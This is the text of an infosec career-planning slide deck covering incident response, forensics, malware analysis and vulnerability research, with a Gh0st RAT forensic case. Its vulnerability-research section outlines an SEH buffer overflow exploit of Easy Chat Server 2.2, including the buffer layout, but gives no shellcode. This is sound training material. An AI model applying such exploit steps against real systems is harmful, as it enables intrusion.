Effective InfoSec Career Planning

aka

Building InfoSec Professional Life

Purpose

This presentation is dedicated to those who want to

build Information Security Professional Career.

About me

• Currently working at one of CERT Teams

• One bit of YEHG (http://yehg.net)

• Holding Offensive Security (OSCP) + CTG (CED,

CWSE ) + Some InfoSec Certs….

• Doing Vuln Research & Artifact Analysis

• Often participant in Cyber Drills, CTFs & Wargame

Challenges.

Agenda

InfoSec’ Nowaday

InfoSec’ Trend

Security Analyst/Consultant

Incident Handling

Artifact Analysis

Computer Forensics

Security Engineering

Policy Maker

InfoSec’ Hall of Fame

Conclusion

Q & A

InfoSec’ Nowaday

InfoSec’ Nowaday

InfoSec’ Trend

Policy Maker

Incident Handling

Cyber Forensic

Artifact Analysis

Security Analysis

Security Engineering

InfoSec’ Trend

Policy Maker

Incident Handling

- SOC Operation Staff

- Incident Handling Engineer

- Incident Responder

Cyber Forensic

Artifact Analysis

Security Analysis

Security Engineering

Incident Handling

• The preparation, detection,

management and resolution of incidents

or events that may occur in the

information system.

Incident Handling

• Key Responsibilities

– Detect & response to security incidents

– Reduce losses

– Reduce downtime

– Identify Attack vector

– Provide focus & resources for the

documentation, planning, and training of

an incident response capability

Incident Handling• Strong technical expertise in:

– Network protocols including TCP/IP fundamental,

– Operating systems (Windows and UNIX)

– Scripting language (such as python, Perl, Bash, PowerShell

or similar) in incident handling environment

• Knowledge of banking systems, enterprise systems

and infrastructure

• Knowledge of virtual environment (VMware)

• Knowledge of security products such as anti-virus,

IDS, IPS, proxy, SIEM, log management tool etc.

• Knowledge of vulnerability management

• Knowledge of Malware & Hacking techniques, etc.

Incident Handling

• Six Step Approach

1. Preparation

2. Identification & Initial Response

3. Containment

4. Remediation

5. Recovery

6. Follow-up

Incident Handling

• Sample Case Study

– Worm Infection

Incident Handling

• Preparation

– Contact list who will be involved into

crisis cell.

– Make sure that analysis tools are up

– Make sure to have network

architecture map

– Perform a continuous security watch

Incident Handling

• Identification & Initial Response

• Detect the infection

– Information coming from several sources

should be gathered & analyzed.

– Antivirus logs & IDS logs

– Suspicious connection attempts & traffic

– High amount of accounts locked

– High load or system freeze

– High volumes of email sent

Incident Handling

• Identification & Initial Response

• Identify the infection

– Analyze the symptoms to identify the worm, its

propagation vectors and countermeasures.

– Leads can be found from:

• CERT’s bulletins, External Support contacts

(antivirus companies, etc), Security websites

(Secunia, SecurityFocus etc.)

– Notify Chief Information Security Officer.

– Contact your CERT if required.

Incident Handling

• Identification & Initial Response

• Assess the perimeter of the infection

– Define the boundaries of the infection

– Identify the business impact of the infection if

possible

Incident Handling

• Containment

1. Disconnect the infected area from internet

2. Isolate the infected area. Disconnect it

from any network.

3. If business-critical traffic cannot be

disconnected, allow it after ensuring that it

cannot be an infection vector or find

validated circumventions techniques.

Incident Handling• Containment

4 . Neutralize the propagation vectors. A propagation

vector can be anything from network traffic to

software flaw. Relevant countermeasures have to be

applied (patch, traffic blocking, disable devices, etc.)

For example, the following techniques can be used:

– Patch deployment tools,

– Windows GPO,

– Firewall rules,

– Operational procedures.

Repeat steps 2 to 4 on each sub-area of the

infected area until the worm stops spreading.

Incident Handling• Remediation

• The following resources should be

considered:

– Vendor fixes (Microsoft, Oracle, etc.)

– Antivirus signature database

– External support contacts

– Security websites

• Test the disinfection process and make sure

that it properly works without damaging any

service.

Incident Handling• Recovery

• Reopen the network traffic that was used as a

propagation method by the worm.

• Reconnect sub-areas together

• Reconnect the mobile laptops to the area

• Reconnect the area to your local network

• Reconnect the area to the Internet

• All of these steps shall be made in a step-by-

step manner and a technical monitoring shall

be enforced by the crisis team.

Incident Handling• Follow-up

• Report: A crisis report should be written and

made available to all of the actors of the crisis

management cell. The following themes

should be described:

– Initial cause of the infection

– Actions and timelines of every important event

– What went right

– What went wrong

– Incident cost

Incident Handling

• Resources & Lab

– https://www.enisa.europa.eu/activities/cert/t

raining/training-resources/setting-up-a-

cert#triage-and-basic-incident-handling

– https://www.enisa.europa.eu/activities/cert/t

raining/training-resources/setting-up-a-

cert#incident-handling-procedure-testing

Incident Handling

• Certification

– GCIH (SANS - Certified Incident Handler)

– GCIA (SANS - Certified Intrusion Analyst)

– C)IHE (mile2 - Certified Incident Handling

Engineer)

– ECIH (EC-Council - Certified Incident

Handler)

Incident Handling

• Book recommendation

– Blue Team Handbook: Incident Response Edition:

– The Computer Incident Response Planning

Handbook

– Computer Incident Response and Forensics Team

Management

InfoSec’ Trend

Policy Maker

Incident Handling

Cyber Forensic

- Network Forensic Expert

- Computer Forensic Expert

- Cyber Forensic Investigator

Artifact Analysis

Security Analysis

Security Engineering

Network Forensics

• Two types of Network Forensics

1. Flow based

2. Packet based

Network Forensics

• Flow based Network Security Analysis

centers around the concept of a network

flow/traffic instead of each packet.

• A flow record is a summarized indicator

that a certain network flow took place and

that two hosts have communicated with

each other at some point in the past.

• Netflow is like a phone bill

– You know who called who, but not what was

said

Network Forensics

• Packet based network security analysis,

unlike flow-based solutions, does not rely

on third-party components to generate

meta or summary information of the

network traffic.

• Instead, all analysis is entirely based on

actually observed raw packets, as they

traverse the network links. It focuses on

each packet or a group of packets.

Network Forensics

Source IP

Dest IP

Source Port

Dest Port

Protocol

Time Info

TCP Flags

Byte Info

Packet Info

NetFlow

Header

Payload

Pcap

=-

ICMP Info

Payload Header

Header

Payload =- Payload Header

Header

Payload =- Payload Header

Header

Payload =- Payload Header

Packet

Headers

Network Forensics

• Some useful tool

– Argus

– Tcpdump

– Snort

– Chopshop

Network Forensics

• Argus

– Converting Pcap to netflow

• argus –r packet.pcap –w packet.argus

• Chopshop

– http://www.github.com/MITRECND/chopsho

p

– MITRE-developed packet framework

Network Forensics

• Sample Case Study

– Forensic on Gh0st RAT

Network ForensicsDetect in wireshark

Network Forensics

Network Forensics

Detect with custom snort rules

Network ForensicsDecode with chopshop

Network ForensicsDecode with chopshop

Network Forensics

• Resources

–Collection of pcap for Forensics

Practise

–http://www.netresec.com/?page=

PcapFiles

Computer Forensic

• Identification

• Extraction

• Documentation

• Preservation

Cyber Forensic

• Key Responsibilities

– Receive, evaluate and initiate the

processing of cyber forensic investigations

– Search and seizure of physical and logical

evidence

– Imaging of hard disk drives, memory and

other digital storage media

– Network packet capture and analysis

– Provision of report and statements

Computer Forensic

Preservation

Presentation

Identification

Seizure

Authentication

Acquisition

Analysis

Scene of

Crime

Forensics

Lab

Computer Forensic

Note Pad ,

Sketch

Pads,

Labels…

Blank

CD/DVD

Pen

DrivesCamera

What to carry ?

Computer Forensics

Storage Container: Anti Static

Bags, Plastic Bubble wrap

Computer Forensics

Write Blocker: A forensic

disk controller or hardware

write-block device is a

specialized type of

computer hard disk

controller made for the

purpose of gaining read-

only access to computer

hard drives without the risk

of damaging the drive's

contents.

Computer Forensics

• Forensic steps: Scene of Crime

– Backup Volatile data in RAM, Router,

etc.

– Photograph and video the scene of

crime

– Identifying Digital storage media

– Draw Network Topology

Computer Forensics

Question to be asked:

• Login Details

– Username

– Passwords

• Encryption

• Files of interest

• E-mail accounts

• Internet Service

Providers

• Off site storage

• Hidden storage

devices

Computer Forensics

Labeling:

Computer ForensicsSeizure:

• Seizure is the process of

capturing the suspect computer or

storage media for evidence

collection.

• The case related reference

documents should also be seized

from the crime scene.

Computer ForensicsSeizure Example:

• In case of Economical Crime:

• Account Book Details

• Passbook details

• Bank Transaction Details

• ATM Credit/Debit Card

Details, etc.

Computer ForensicsSeizure Example:

• In case of Forged Documents:

–Academic Certificates

–Bill Receipts

–Passport

–Legal Property Papers etc.

Computer ForensicsPacking and Transportation:

• Properly document and label the

evidence before packaging.

• Use anti-static wrap or bubble wrap for

magnetic media.

• Avoid folding, bending or scratching

the computer media.

Computer ForensicsPacking and Transportation:

• While transporting, place the computer

securely on the floor of the vehicle

where the ride is smooth.

• Avoid radio transmissions,

electromagnetic emissions, moisture in

the vicinity of digital evidence.

Computer Forensics

Acquisition:

• Use of Write Blocker

devices

• Thumbscrew

• FAST BLOC

• Tableau

Computer Forensics

Acquisition:

• Making Forensic Duplicate copy of the

suspect storage media is acquisition.

• A Forensic Duplicate is a file that

contains every bit of information from

the source disk.

• By using Software/Hardware

Computer Forensics

Acquisition:

• Using Software Tool requires a

hardware write blocker at source

end.

– FASTBloc FE

– Tablue

– Software EnCase

– FTK Imager

Computer Forensics

Authentication:

• Hash Value

–Verify the integrity of Forensic

Duplicate.

–It is also known as Message

Digest or Fingerprint is basically a

digital signature.

Computer Forensics

Analysis:

• The Process of searching for crime

relevant data and extract it.

• The analyst has to search data in

– Deleted Files, Unallocated Space, Log

Entries, System Files, Cookies, Slack

Space, Free Space, Registry Entries,

Printer Spool Files, Keywords

Computer Forensics

Free Digital Forenics Tool

• SAN SIFT

• ProDiscover Basic

• Volatility

• The Sleuth Kit (+Autopsy)

• FTK Imager

• DEFT

Cyber Forensics

• Book Recommendation

– Guide to Computer Forensics and Investigations

– Kingpin: How One Hacker Took Over the Billion-

Dollar Cybercrime Underground

– Digital Forensics with Open Source Tools

Cyber Forensics

• Certification

– CHFI (EC Council)

– Certified Computer Forensics Examiner

(CCFE) (IACRB)

– Global Information Assurance Certification

Forensic Examiner (GCFE)

InfoSec’ Trend

Policy Maker

Incident Handling

Cyber Forensic

Artifact Analysis

- Malware Analyst

- Reverse Engineering Specialist

Security Analysis

Security Engineering

Artifact Analysis

• Key responsibilities

– Perform Malware Analysis

– Perform Attack Analysis

Artifact Analysis

• Type of Malware Analysis

– Static Malware Analysis

– Dynamic Malware Analysis

Artifact Analysis

• Static Malware Analysis

– dissecting the different resources of the binary file

and studying each component.

– The binary file can also be disassembled (reverse

engineered) using a disassembler such as IDA.

– A malware analyst can then make sense of the

Assembly instructions and have an image of what

the program is supposed to perform.

Artifact Analysis

• Static Malware Analysis

– Some useful tools

• PEview

• Depends

• PEBrowse Pro

• Objdump

• IDA Pro

• Resource Hacker

• Strings

Artifact Analysis

• Dynamic Malware Analysis

– watching and logging the behavior of the malware

while running on the host. Virtual machines and

Sandboxes are extensively used for this type of

analysis.

– The malware is debugged while running using a

debugger such as GDB or Windbg to watch the

behavior of the malware step by step while its

instructions are being processed by the processor

and their live effects on RAM.

Artifact Analysis

• Dynamic Malware Analysis

– Some useful tools

• Sysinternal Suite

• Process Explorer

• Regshot

• UN-Pack

• Olly-dbg

• Port Explorer

Artifact Analysis

• Sample Case Study

– Memory Analysis on Gh0st RAT

(Continues of Network Forensic Case Study)

Artifact Analysis

• C2 client at 58.64.132.141 was

communicating with 172.16.150.20 that the

localhost name was ENG-USTXHOU-148

• Loading the memdump.bin file into

Volatility's imageinfo module confirms what

we saw in the Gh0st data; this machine is

running Windows XP Service Pack 3.

Artifact Analysis

Artifact AnalysisTaking a look at the output of connscan

Artifact AnalysisOutput of pstree show the process with the PID 1024 is

svchost.exe

Artifact AnalysisDig into svchost a little more by running the dlllist

module against it.

Artifact Analysis

There is an abnormal dll named 6to4ex.dll listed

Artifact Analysis

Dump the suspect file out using the dlldump module

Artifact AnalysisGet the md5 of the file

Search in virustotal.

Artifact Analysis

if VirusTotal has seen this before

Artifact Analysis

how did this machine become compromised in the first

place?

strings memdump.bin | grep -C 30 58.64.132.141

Artifact Analysis

• Analysis Environment

– Santoku (https://santoku-linux.com/)

• a platform for mobile forensics, mobile

malware analysis and mobile application

security assessment.

– REMnux (https://remnux.org/)

• A Linux Toolkit for Reverse-Engineering and

Analyzing Malware

Artifact Analysis

• Book Recommendation

– Malware Analyst's Cookbook

– Pratical Malware Analysis

Reverse Engineering

• Need to familiar with IDA Pro/Free,

OllyDbug,

• Focus on a single architecture initially:

x86, x86_64, or ARM

• Try some crackme exercises

(http://www.crackmes.de/)

Reverse Engineering

• Book recommendations

– Practical Reverse Engineering

– Reversing: Secrets of Reverse

Engineering

– The IDA Pro Book

Artifact Analysis

• Resources

– http://www.opensecuritytraining.info/Mal

wareDynamicAnalysis.html

– http://www.opensecuritytraining.info/Life

OfBinaries.html

– http://www.opensecuritytraining.info/Rev

erseEngineeringMalware.html

Artifact Analysis

• Certification

• CREA:Certified Reverse Engineering

Analyst (IACRB)

• GREM:GIAC Malware Analysis

Certification (SANS-FOR610)

InfoSec’ Trend

Policy Maker

Incident Handling

Cyber Forensic

Artifact Analysis

Security Analysis

- Penetration Tester

- Vulnerability Researcher

- Application Security Expert

- Mobile App Security Expert

Security Engineering

Vulnerability Assessment

• Key Responsibilities

– Perform application and infrastructure

penetration tests, as well as physical

security review and social engineering tests

for our global clients

– Review and define requirements for

information security solutions

– Participate in Security Assessments of

networks, systems and applications

Vulnerability Research

• Go through reverse engineering before

jumping into it.

• For Starter - Stack overflows, Heap

overflows, and Format String bugs.

• Practice on bypass SEH, ASLR,

DEP,etc…

Vulnerability Research

• Some useful tools

– RATS - Rough Auditing Tool for

Security

– RIPS - A static source code analyzer

– Immunity Debugger

– Burpsuite

– Peach Fuzzer

– Metasploit Framework

Vulnerability Research

• Sample Case Study

• Exploit EFS Software Easy Chat

Server 2.2

CVE-2004-2466

Vulnerability Research

• First Step

• Running

Easy Chat on

Win XP3

Vulnerability Research

• Use wireshark to make fuzzer

Vulnerability Research

• Fuzzer

Vulnerability Research• Attach app with debugger

Vulnerability Research• Run fuzzer & check EIP

Vulnerability Research• EIP is not overwrite, we check SEH Chain

(Alt+S)

• we get EIP was over flow by 41414141 this

is character .

Vulnerability Research

• Structured Exception Handling (SEH) is

a Windows mechanism for handling

both hardware and software exceptions

consistently.

• The concept is quite simple — try to

execute a block of code and if an

error/exception occurs, do whatever the

“except” block (aka the exception

handler) says

Vulnerability Research

Vulnerability Research

Vulnerability Research

• So to recap, we need the following for our

basic SEH exploit:

– offset to Next SEH

– jump code for Next SEH to hop over SHE

– address for a usable POP+POP+RET

instruction

– shellcode

Vulnerability ResearchCreate Pattern & edit fuzzer to know exact location

Vulnerability ResearchCheck SEH Chain & EIP

Vulnerability ResearchTo find an appropriate memory location for an SEH bypass

by using the “!mona seh” command of Mona.py function

Vulnerability ResearchPayload generate & add to fuzzer

Vulnerability Research

Vulnerability ResearchOur fuzzer modified as

Buffer += “A”*216 + [nSEH] + [SEH] + Payload

Vulnerability Research

Rooted !!!

Security Analysis

• Book recommendations

– Hacking: The Art of Exploitation

– The Shellcoders Handbook

– The Art of Software Security

Assessment

Security Analysis

• Certification

• OSCP ( Offensive Security Certified

Professional )

• OSCE ( Offensive Security Certified

Expert)

• GPEN ( GIAC Penetration Tester )

• GPEX ( GIAC Exploit Researcher and

Advanced Penetration Tester )

Security Analysis

• Resources

• http://www.opensecuritytraining.info/Exp

loits2.html

• http://www.opensecuritytraining.info/Exp

loits1.html

• http://www.opensecuritytraining.info/Inte

rmediateX86.html

InfoSec’ Trend

Policy Maker

Incident Handling

Cyber Forensic

Artifact Analysis

Security Analysis

Security Engineering

- Network Security Engineer

- Computer Security Engineer

- Security Architect

InfoSec’ Trend• Responsibilities of Security Engineer

– Develop, review, and update Information Security

Policies, processes, guidelines, hardening

standards.

– Develop and execute annual information security

assessment plans.

– Develop and maintain Information Security Risk

Register.

– Performing the Network Security operations for all

related systems: Firewalls, IDS/IPS, VPN, PKI,

Content Security, SIEM, Identity and Authentication

Management Systems, DLP etc.

InfoSec’ Trend

• Certification

– CCNA/CCNP ( Security )

– Comptia Security+

– ENSA ( EC-council )

– CISM

– CISA

InfoSec’ Trend

Policy Maker

( CISO/ InfoSec Manager / Director of InfoSec )

Incident Handling

Cyber Forensic

Artifact Analysis

Security Analysis

Security Engineering

InfoSec’ Trend

• Responsibilities of CISO– Establishing and implementing security-related policies.

– Overseeing regulatory compliance.

– Ensuring data privacy.

– Managing the company's CERT Team.

– Supervising identity and access management.

– Establishing and overseeing the organization's security

architecture.

– Conducting electronic discovery and digital forensic

investigations.

– Working with other high-level executives to establish disaster

recovery and business continuity plans.

InfoSec’ Trend

• Top Penetration Testing Method

– ISSAF

• Information Systems Security Assessment

Framework

– OSSTMM

• Open Source Security Testing Methodology

Manual (ISECOM)

– OWASP

• Open Web Application Security Project

InfoSec’ Trend

• Certification

• CISSP

– Architecture (CISSP-ISSAP®)

– Engineering (CISSP-ISSEP®)

– Management (CISSP-ISSMP®)

• CISO ( EC-council )

• CISSO ( mile2 )

• PCI DSS

InfoSec’ Hall of Fame

• Bug Hunting

• CTF/Wargame

• CVE Disclosure

• Opensource InfoSec Tool Development

Bug hunting

https://bugcrowd.com/

Bug hunting

https://hackerone.com

Bug hunting

https://technet.microsoft.com/en-us/security/dn425036

CTF & Wargame

• An introductory CTF like CSAW, Pico

CTF, Microcorruption, or any of the

other dozens available.

• CTF competitions archive

(http://captf.com/)

CTF & Wargame

• Difficulty is subjective based on your

individual skill set.

• CTF competitions generally focus on

the following skills: Reverse

engineering, Cryptography,

Programming challenge, Web

vulnerabilities, Binary exercises,

Networking, and Forensics.

CTF & Wargame

https://ctftime.org/

CTF & Wargame

https://ctftime.org/

CTF & Wargame

http://captf.com/calendar/

Practice Lab

• https://www.vulnhub.com/

• https://exploit-exercises.com/

• http://captf.com/practice-ctf/

Conclusion

• CSOs and CISOs need to continually

monitor the evolving threat landscape, and

to replace an "if we get hacked" mindset

with a "when we get hacked" one.

• InfoSec: one of Art

– Think out of box

– Try harder

Thank You For Your Attention !